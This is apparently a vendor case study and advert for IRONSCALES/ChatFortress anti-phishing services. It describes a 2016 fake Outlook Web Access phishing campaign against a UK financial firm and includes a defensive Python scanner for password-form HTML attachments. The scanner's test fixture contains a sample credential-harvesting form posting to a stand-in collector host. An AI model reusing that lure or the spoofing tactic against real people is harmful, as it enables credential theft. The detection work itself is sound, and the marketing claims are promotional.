
ELIMINATING TARGETED PHISHING EMAIL ATTACK ON FINANCIAL SERVICES COMPANY THROUGH AUTOMATION AND AWARENESS

Cybersecurity is an important element in every employee's daily tasks. If an employee, contractor or vendor has access to your email, you should be implementing an email phishing training and awareness program.

The financial services industry is a prime target for cybercrime, with hackers targeting financial services firms 300 percent more than any other sector. A common and, frankly, simple method cyber criminals use to access an enterprise’s confidential and personal information is through phishing attacks. In fact, phishing attacks surged by 250 percent in the first quarter of 2016 - the highest ever since 2004, according to the Anti-Phishing Working Group (APWG).

A financial services company requesting to remain anonymous, located in the United Kingdom, services both small and medium sized businesses (SMB) and enterprises across Europe, the Middle East and Africa. As such, the company must comply with industry standards to ensure its company and its customers’ data is secure. However, regulations are often far behind today’s motivated and agile cyber criminals determined to hack into organizations’ networks for financial gain.

IronTraps™ is a patent-pending, automatic phishing email incident response module, built to empower skilled and vigilant employees to report ongoing attacks, followed by an enterprise-wide remediation response.

While the company had traditional defenses in place, such as anti-virus, SandBox, Firewalls, IPS and spam filters, it recognized that these phishing remediation solutions were ineffective. Therefore, in early 2016, the company selected IRONSCALES as a means to proactively defend against phishing attacks and lead the company’s anti-phishing awareness and immediate response effort.

Employees completed IronSchool, IRONSCALES’ employee awareness program, whose simulation program contains a comparable scenario in order to train employees to successfully navigate similar phishing attacks.

In addition, IronTraps, the automated phishing email response solution, was immediately deployed on all company endpoints.

THE ATTACK

On July 11, 2016 at 10:58am, a malicious and sophisticated email phishing campaign targeted the financial services company, with the potential to spread to all of its employees, customers, third-party vendors and partners across the globe. The email’s subject line was titled “BAN009/0002 Bank of Ireland” and contained an HTML file named ‘Report_ Template.html.’ In addition, the deceptive HTML file contained a perfect mockup page of a Microsoft Outlook Web Access (OWA) login page in an attempt to steal user credentials.

Attackers are commonly using the social media login pages that we know, like and trust to mask their attacks.

Once the email was opened and the file was downloaded, the attacker had the opportunity to steal users’ information. To do so, the attacker manipulated the email to cause some versions of Microsoft Outlook (2013) to crash. To reduce suspicion among currently logged-in users, a pop-up window appeared with the text “Due to version update logout was enforced” and the user was redirected to a fake OWA login page, created by the attacker, to submit his/her credentials.

Did you notice that the attackers are using common behaviors to stimulate trust?
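
As an added illustration (not code from IRONSCALES or ChatFortress), the attachment pattern described above, an HTML file that carries its own login form, can be checked for when a message is received or reported. Apart from the subject line, the sample message, host names and function names are constructed for this example.

```python
import email
from email import policy
from email.message import EmailMessage
from html.parser import HTMLParser
from urllib.parse import urlparse

class FormFinder(HTMLParser):
    """Records form action URLs and whether a password field is present."""
    def __init__(self):
        super().__init__()
        self.actions, self.has_password = [], False

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self.actions.append(attrs.get("action") or "")
        elif tag == "input" and (attrs.get("type") or "").lower() == "password":
            self.has_password = True

def scan_message(raw_bytes):
    """Return one finding per HTML attachment that asks for a password."""
    msg = email.message_from_bytes(raw_bytes, policy=policy.default)
    findings = []
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        is_html = part.get_content_type() == "text/html" or name.lower().endswith((".html", ".htm"))
        if not is_html:
            continue
        finder = FormFinder()
        finder.feed(part.get_payload(decode=True).decode("utf-8", errors="replace"))
        if finder.has_password:
            # Hosts the form would post credentials to (empty if the action is relative).
            hosts = sorted({h for h in (urlparse(a).hostname for a in finder.actions) if h})
            findings.append({"attachment": name, "post_hosts": hosts})
    return findings

def build_sample(body_html):
    """Constructed test message; only the subject comes from the case study."""
    m = EmailMessage()
    m["Subject"] = "BAN009/0002 Bank of Ireland"
    m["From"], m["To"] = "sender@example.org", "user@example.com"
    m.set_content("Please review the attached report.")
    m.add_attachment(body_html.encode(), maintype="text", subtype="html", filename="report.html")
    return m.as_bytes()

# Constructed attachment bodies: one with a credential form, one without.
LURE = ('<form action="https://collector.example.net/owa/auth" method="post">'
        '<input name="username"><input type="password" name="password"></form>')
BENIGN = "<h1>Quarterly report</h1><p>No forms here.</p>"
```

A legitimate login page is served by the mail server rather than delivered as a file, so any finding from scan_message is a reasonable trigger for quarantine or analyst review.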

THE RESPONSE

Within five minutes of the first email's arrival, an employee reported the attack as suspicious through IRONSCALES' active protection Email Guardian Microsoft Outlook button, a one-click process that sends the report to the IRONSCALES system. At this point, 46 mailboxes were affected.


Immediately, IRONSCALES' automatic remediation process was triggered, and IronTraps automatically deleted the suspicious email from the 46 affected mailboxes and prevented the phishing attack from spreading to any other mailboxes.

This prevents other employees from clicking on the email.

During the seven minutes between detection and completion of remediation, IronTraps secured ALL mailboxes and protected ALL of the company’s employees from unintentionally sharing credentials with the hackers. Ultimately, IRONSCALES completely removed the threat from all mailboxes in 12 minutes and prevented significant financial and reputational damages to the company.

The ChatFortress Guardian program provides you with real-time human virtual security analysts who respond to all email reports to verify and validate the attacks. This provides you with an additional layer of security and protection without burdening your existing IT staff.


About ChatFortress and IRONSCALES Automation and Awareness for Email Phishing

Globally, phishing attacks have evolved from an occasional annoyance into a persistent epidemic. In fact, increasingly sophisticated and highly targeted phishing schemes have essentially transformed every enterprise employee into a primary threat vector. Most enterprises today are cognizant of the financial, reputational and even physical risks of phishing; however, few have modified their defenses to meet the complexity of the modern threat landscape.

IRONSCALES is the world’s first and only anti-email phishing technology to combine human intelligence with machine learning. Our suite of technologies works together to prevent, detect and respond automatically to today’s sophisticated email phishing attacks using a multi-layered and automated approach.

IRONSCALES ensures that employees are prepared to take an active role in protecting the integrity of their organizations, while reinforcing their efforts with machine learning technology that can automatically defend enterprises from attacks in real-time.

When a phishing attack is automatically detected or reported, the following sequence of events is triggered:

  1. An automatic notification is sent to both the security team and IRONSCALES’ servers.
  2. IronTraps then automatically executes a comprehensive phishing forensic examination of the suspicious email using our integrated Multi-AV and Sandbox Scan. Working in conjunction with IRONSCALES’s advanced technology, IronTraps analyzes the number and skill ranking of the reporter, in addition to other proprietary analytics, which determines the most appropriate mitigation or remediation response.
  3. Once the attack is verified, an automatic remediation response is initiated consisting of an enterprise-wide removal of all malicious emails.

ChatFortress provides clients with a complete automated solution for identifying and removing email phishing and malware-related attacks. If you would like more information, visit www.StopEmailPhishing.com

If you want to know more about our Virtual Email Security Officer solution please contact our team.

ChatFortress Eliminates Bank Transfer Wire Fraud and Eliminates Email Phishing Attacks!

Helping you verify the device and the person you're sharing wire information with via our secure chat platform. When you need to validate the person you are sending information to, you need ChatFortress communication. To speak with a ChatFortress agent, call (307) 999-7755. If you want a demo, you can schedule a ChatFortress demo.